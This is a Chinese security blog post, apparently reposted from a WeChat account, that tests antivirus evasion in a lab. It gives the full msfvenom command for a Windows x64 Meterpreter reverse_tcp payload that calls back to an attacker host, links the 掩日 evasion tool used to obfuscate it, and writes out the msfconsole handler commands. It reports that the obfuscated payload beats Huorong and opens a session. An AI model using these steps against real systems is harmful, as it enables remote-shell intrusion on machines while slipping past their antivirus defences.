微信公众号:乌鸦安全
扫取二维码获取更多信息!
1. 环境
攻击机: kali linux 10.211.55.23
受害机: Windows10 360主动防御
Windows7 火绒主动防御
2. 生成exe文件
在kali linux下使用msfvenom生成一个64位的exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe
将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软
使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)
下载地址:
https://github.com/1y0n/av_evasion_tool/
将文件直接拖过来就行了
最后会生成一个YR_1.exe文件
将这两个文件分别压缩备份,发送到window10和window7上
3. 静态测试
打开各自的杀软进行测试
3.1 360
均报毒
3.2 火绒
只有一个文件报毒
4. 上线测试
4.1 攻击机配置
msfconsole
use exploit/multi/handler
set LHOST 10.211.55.23
set LPORT 4444
set payload windows/x64/meterpreter/reverse_tcp
exploit
4.2 360下
4.2.1 1..exe
直接gg
4.2.2 免杀版1.exe
直接gg
4.3 火绒
4.3.1. 1.exe
gg
4.3.2 免杀版1.exe
上线正常
执行命令
5. 总结
总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!👍
扫一扫
1071
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
